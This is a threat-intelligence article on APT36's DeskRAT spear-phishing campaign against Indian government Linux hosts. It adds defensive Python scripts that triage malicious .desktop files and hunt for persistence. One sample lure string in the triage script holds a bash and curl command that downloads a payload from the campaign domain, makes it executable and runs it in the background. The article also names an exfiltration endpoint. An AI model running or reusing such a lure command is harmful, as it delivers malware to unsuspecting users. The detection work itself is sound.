Golang-Based DeskRAT Malware Campaign is Used by APT36 to Target the Indian Government


“APT36 targets the Indian government with a campaign delivering the Golang-based DeskRAT malware.”

A threat actor with ties to Pakistan has been observed running spear-phishing campaigns against Indian government organizations to deliver DeskRAT, a Golang-based remote access trojan.

Sekoia observed the activity in August and September 2025 and attributed it to Transparent Tribe (also known as APT36), a state-sponsored hacking group that has been active since at least 2013. The activity builds on an earlier campaign that CYFIRMA disclosed in August 2025.

The attack chains use phishing emails carrying a ZIP attachment or, occasionally, a link to an archive hosted on a reputable cloud service such as Google Drive. The ZIP archive contains a malicious .desktop file whose embedded commands open a decoy PDF (“CDS_Directive_Armed_Forces.pdf”) in Mozilla Firefox while the main payload is executed in the background.

Both artifacts are retrieved from the external server “modgovindia[.]com” and executed. As in the earlier campaign, the remote access trojan can establish command-and-control (C2) over WebSockets, and the campaign is designed to target machines running BOSS (Bharat Operating System Solutions) Linux.
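The .desktop file is the pivot of this chain, and it can be triaged statically before anyone double-clicks it. The following Python is an added example written for this page, not Sekoia's tooling or DeskRAT's code: it parses a .desktop file with the standard-library configparser, looks through the quoting of the Exec line, and reports the traits the article describes (a document-looking name on a Type=Application entry, a downloader plus a shell, a remote domain, a payload pushed to the background, a decoy opened in Firefox). The lure entry below is constructed for the example; the domain is the one the article names, but the paths, filenames and exact command line are assumptions, and the benign entry is a generic launcher for comparison.

```python
"""Static triage of Linux .desktop lures (added example; not from the article)."""
import os
import re
from configparser import ConfigParser

# Constructed sample in the shape the article describes: a .desktop entry
# whose Exec line fetches a decoy PDF and the payload, runs the payload in the
# background, and opens the PDF in Firefox. The domain is the one named in the
# article; the paths, filenames and exact command line are assumptions.
LURE_DESKTOP = """\
[Desktop Entry]
Type=Application
Name=CDS_Directive_Armed_Forces.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -fsSL https://modgovindia.com/d/CDS_Directive_Armed_Forces.pdf -o /tmp/CDS_Directive_Armed_Forces.pdf; curl -fsSL https://modgovindia.com/d/sys -o /tmp/.sys; chmod +x /tmp/.sys; nohup /tmp/.sys >/dev/null 2>&1 & firefox /tmp/CDS_Directive_Armed_Forces.pdf"
"""

# Constructed benign entry for comparison (what an ordinary launcher looks like).
BENIGN_DESKTOP = """\
[Desktop Entry]
Type=Application
Name=Firefox Web Browser
Exec=firefox %u
Icon=firefox
Terminal=false
"""

DOWNLOADERS = {"curl", "wget"}
SHELLS = {"bash", "sh", "dash", "zsh"}
DOC_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx")
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
BACKGROUND_RE = re.compile(r"\s&\s|\bnohup\b")


def parse_desktop(text):
    """Return the [Desktop Entry] keys of a .desktop file as a dict."""
    cp = ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str                      # .desktop keys are case-sensitive
    cp.read_string(text)
    if not cp.has_section("Desktop Entry"):
        raise ValueError("not a .desktop file: no [Desktop Entry] section")
    return dict(cp["Desktop Entry"])


def exec_programs(exec_line):
    """Bare program names referenced anywhere in an Exec= value, looking
    through quotes and shell separators so the inner command of
    `bash -c "..."` is inspected too."""
    tokens = [t for t in re.split(r"""[\s;&|"']+""", exec_line) if t]
    return {os.path.basename(t) for t in tokens}


def triage_desktop(text):
    """Return the indicators found in one .desktop file plus a verdict."""
    entry = parse_desktop(text)
    exec_line = entry.get("Exec", "")
    programs = exec_programs(exec_line)
    name = entry.get("Name", "").lower()
    findings = {
        "downloaders": sorted(programs & DOWNLOADERS),
        "shells": sorted(programs & SHELLS),
        "domains": sorted(set(URL_RE.findall(exec_line))),
        # A document-looking Name on a Type=Application entry is the
        # masquerade the lure depends on: the user believes they open a PDF.
        "document_masquerade": entry.get("Type") == "Application"
        and name.endswith(DOC_EXTENSIONS),
        # Terminal=false keeps the downloader's output off the screen.
        "hidden_console": entry.get("Terminal", "true").lower() == "false",
        "makes_executable": "chmod" in programs,
        "backgrounded": bool(BACKGROUND_RE.search(exec_line)),
        "opens_decoy_in_browser": "firefox" in programs and ".pdf" in exec_line.lower(),
    }
    findings["suspicious"] = (
        findings["document_masquerade"]
        and bool(findings["downloaders"] or findings["shells"])
    )
    return findings


if __name__ == "__main__":
    for label, text in (("lure", LURE_DESKTOP), ("benign", BENIGN_DESKTOP)):
        print(label, triage_desktop(text))
```

Run it over every .desktop file in an extracted attachment or in a mail gateway's detonation output; the verdict key is deliberately conservative (document masquerade plus a downloader or shell), while the individual indicators are left visible so an analyst can tune the rule to their own environment.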

The malware supports four persistence mechanisms: an entry in the Linux autostart directory (“$HOME/.config/autostart”), a cron job, a systemd service, and a bashrc modification that launches the trojan through a shell script written to the “$HOME/.config/system-backup/” directory.
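Four persistence points means four places to check on every BOSS Linux host in scope. The following Python is an added example written for this page, not a Sekoia or CYFIRMA tool: it inspects the XDG autostart directory, the user's systemd units, the shell rc files and a captured `crontab -l` listing, flags any line that points at the staging directory the article names, and inventories that directory. It assumes, which the article does not state, that the autostart, cron and systemd entries also reference the “$HOME/.config/system-backup/” path; lines that launch anything from a hidden directory under the home are reported at lower confidence so the hunt is not blind to a renamed stager. The demo home directory and its planted artifacts are constructed in a temporary directory by the example itself, and the launcher filename “backup.sh” is an assumption.

```python
"""Hunt for the four DeskRAT persistence points (added example; not from the article)."""
import re
import stat
import tempfile
from pathlib import Path

STAGING_DIR = ".config/system-backup"          # path named in the article
# A command that runs something from a hidden directory under the home
# ($HOME/.x/..., ~/.x/..., %h/.x/... or an absolute /home/<user>/.x/ path)
# is the lower-confidence signal used in case the stager was renamed.
HIDDEN_HOME_RE = re.compile(r"(?:\$HOME|~|%h|/home/[^/\s]+)/\.[^/\s]+/")
RC_FILES = (".bashrc", ".bash_profile", ".profile")


def classify(line):
    """Return "known_staging", "hidden_home", or None for one config line."""
    if STAGING_DIR in line:
        return "known_staging"
    if HIDDEN_HOME_RE.search(line):
        return "hidden_home"
    return None


def hunt_persistence(home, crontab_text="", extra_unit_dirs=()):
    """Return (kind, location, line_no, verdict, text) for every suspicious
    line across the four persistence locations, plus an inventory of the
    staging directory if it exists."""
    home = Path(home)
    findings = []

    def scan(kind, location, text):
        for no, line in enumerate(text.splitlines(), 1):
            verdict = classify(line)
            if verdict:
                findings.append((kind, str(location), no, verdict, line.strip()))

    # 1. XDG autostart entries run at every desktop login.
    for p in sorted((home / ".config/autostart").glob("*.desktop")):
        scan("autostart", p, p.read_text(errors="replace"))
    # 2. cron: pass in the output of `crontab -l` captured on the host.
    scan("cron", "crontab -l", crontab_text)
    # 3. systemd: user units under the home, plus any system unit dirs given.
    for d in (home / ".config/systemd/user", *map(Path, extra_unit_dirs)):
        if d.is_dir():
            for p in sorted(d.glob("*.service")):
                scan("systemd", p, p.read_text(errors="replace"))
    # 4. shell rc files sourced by interactive shells.
    for rc in RC_FILES:
        p = home / rc
        if p.is_file():
            scan("shellrc", p, p.read_text(errors="replace"))
    # The staging directory itself: anything executable in it is of interest.
    staging = home / STAGING_DIR
    if staging.is_dir():
        for p in sorted(staging.iterdir()):
            mode = p.stat().st_mode
            verdict = "executable" if mode & stat.S_IXUSR else "file"
            findings.append(("staging", str(p), 0, verdict, oct(mode & 0o777)))
    return findings


def build_demo_home():
    """Create a throwaway home directory with constructed artifacts laid out
    the way the article describes; returns (home_path, crontab_text)."""
    home = Path(tempfile.mkdtemp(prefix="deskrat-demo-"))
    launcher = home / STAGING_DIR / "backup.sh"          # filename is an assumption
    launcher.parent.mkdir(parents=True)
    launcher.write_text('#!/bin/bash\nexec "$HOME/.config/system-backup/.svc"\n')
    launcher.chmod(0o755)
    (home / ".config/autostart").mkdir(parents=True)
    (home / ".config/autostart/system-backup.desktop").write_text(
        "[Desktop Entry]\nType=Application\nName=System Backup\n"
        f"Exec={home}/.config/system-backup/backup.sh\nHidden=false\n")
    (home / ".config/autostart/benign.desktop").write_text(
        "[Desktop Entry]\nType=Application\nName=Updater\nExec=/usr/bin/update-notifier\n")
    (home / ".config/systemd/user").mkdir(parents=True)
    (home / ".config/systemd/user/system-backup.service").write_text(
        "[Service]\nExecStart=%h/.config/system-backup/backup.sh\nRestart=always\n"
        "[Install]\nWantedBy=default.target\n")
    (home / ".bashrc").write_text(
        "alias ll='ls -l'\n"
        '[ -x "$HOME/.config/system-backup/backup.sh" ] && "$HOME/.config/system-backup/backup.sh" &\n'
        '"$HOME/.local/bin/helper" &\n')
    crontab = "@reboot $HOME/.config/system-backup/backup.sh\n0 * * * * /usr/bin/true\n"
    return home, crontab


if __name__ == "__main__":
    demo_home, crontab_text = build_demo_home()
    for finding in hunt_persistence(demo_home, crontab_text):
        print(*finding, sep="\t")
```

On a real host, point `hunt_persistence` at each user's home, feed it `crontab -l -u <user>` output, and pass `/etc/systemd/system` through `extra_unit_dirs` in case the service was installed system-wide; a "known_staging" hit in any of the four locations is enough to pull the machine for imaging.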


DeskRAT supports five commands:

  • ping: Sends the C2 server a JSON message containing “pong” and the current timestamp.
  • heartbeat: Sends a JSON message containing a timestamp and a heartbeat_response.
  • browse_files: Sends directory listings to the C2 server.
  • start_collection: Searches for files smaller than 100 MB that match a predefined list of extensions and uploads them.
  • upload_execute: Drops and runs a second-stage payload, which can be a Python script, a shell script, or a .desktop file.

Sekoia (the French cybersecurity company)

“The C2 servers of DeskRAT are referred to as stealth servers.”

“A name server that is not listed in any publicly accessible NS records for the related domain is referred to as a stealth server in this context.”

“Transparent Tribe has now switched to employing dedicated staging servers, whereas the original attacks used normal cloud storage sites like Google Drive to disseminate malicious payloads.”

The findings follow a report from QiAnXin XLab describing how the campaign used phishing emails with booby-trapped desktop file attachments to target Windows endpoints with a Golang backdoor it tracks as StealthServer, which points to a cross-platform focus.

StealthServer for Windows comes in three variants:

  • StealthServer Windows-V1 (observed in July 2025): Uses several anti-analysis and anti-debugging techniques to evade detection; establishes persistence through Windows Registry modifications, scheduled tasks, and a PowerShell script placed in the Startup folder; and communicates with the C2 server over TCP to list files and upload or download specific files.
  • StealthServer Windows-V2 (observed in late August 2025): Keeps the same functionality but adds anti-debugging checks for analysis tools such as IDA, x64dbg, and OllyDbg.
  • StealthServer Windows-V3 (observed in late August 2025): Functions similarly to DeskRAT and communicates over WebSocket.

XLab also observed two Linux versions of StealthServer. One is DeskRAT, which in XLab's analysis supports an additional “welcome” command. The second Linux version uses HTTP rather than WebSocket for C2 communications.

It supports three commands:

  • browse: Lists all files in a given directory.
  • upload: Uploads a specified file.
  • execute: Runs a command in bash.

It also recursively searches from the root directory (“/”) for files matching a set of extensions, then exfiltrates the files it finds in encrypted form via an HTTP POST request to “modgovindia[.]space:4000”.

This suggests the HTTP-based Linux version may be an earlier iteration of DeskRAT, since DeskRAT moves file exfiltration behind a dedicated “start_collection” command.


QiAnXin XLab

“A wide range of tools, multiple variations, and a rapid delivery cadence are characteristics of the group’s frequent operations.”

Attacks by Other Threat Clusters in South and East Asia

The disclosure coincides with reports of several other campaigns by threat actors with a South Asian focus.

  • Bitter APT ran a phishing campaign against the military, government, and electric power sectors in China and Pakistan, using malicious Microsoft Excel attachments or RAR archives that exploited CVE-2025-8088 to drop “cayote.log”, a C# implant that collects system information and executes arbitrary executables fetched from an attacker-controlled server.
  • SideWinder launched a new wave of targeted activity, a “concentrated” campaign codenamed Operation SouthNet, that used credential-harvesting portals and weaponized lure documents delivering multi-platform malware to the maritime industry and other verticals in Pakistan, Sri Lanka, Bangladesh, Nepal, and Myanmar.
  • OceanLotus (also known as APT-Q-31), a hacking group with ties to Vietnam, used the Havoc post-exploitation framework in attacks on businesses and government agencies in China and other Southeast Asian countries.
  • Mysterious Elephant (also known as APT-K-47) launched a campaign in early 2025 against government agencies and foreign affairs sectors in Pakistan, Afghanistan, Bangladesh, Nepal, India, and Sri Lanka. After initial access, a PowerShell script drops BabShell, a C++ reverse shell, which in turn launches MemLoader HidenDesk (a loader that runs a Remcos RAT payload in memory) and MemLoader Edge (another loader that embeds VRat, a variant of the open-source vxRat).

Notably, these intrusions also relied on several modules dedicated to exfiltrating WhatsApp chats from compromised systems, including Uplo Exfiltrator and Stom Exfiltrator, each of which captures a different kind of data shared through the messaging app.

Another tool in the threat actor's kit, ChromeStealer Exfiltrator, harvests cookies, tokens, and other sensitive data from Google Chrome and, as its name suggests, can also siphon WhatsApp files.

The findings paint a picture of Mysterious Elephant as a group that has matured into a sophisticated threat operation with its own arsenal of custom malware, moving beyond the reuse of tools from other threat actors.

The group is known to share tactical overlaps with Origami Elephant, Confucius, and SideWinder, all of which are assessed to operate in support of Indian interests.

Kaspersky

“The Asia-Pacific region’s government agencies and foreign affairs sectors are seriously threatened by Mysterious Elephant, a highly skilled and active Advanced Persistent Threat group.”

“The utilization of open-source and custom tools, such as BabShell and MemLoader, demonstrates their technical proficiency and readiness to invest in creating sophisticated malware.”

About The Author

Suraj Koli is a content specialist in technical writing about cybersecurity and information security. He has written many articles on cybersecurity concepts, the latest trends in cyber awareness, and ethical hacking.
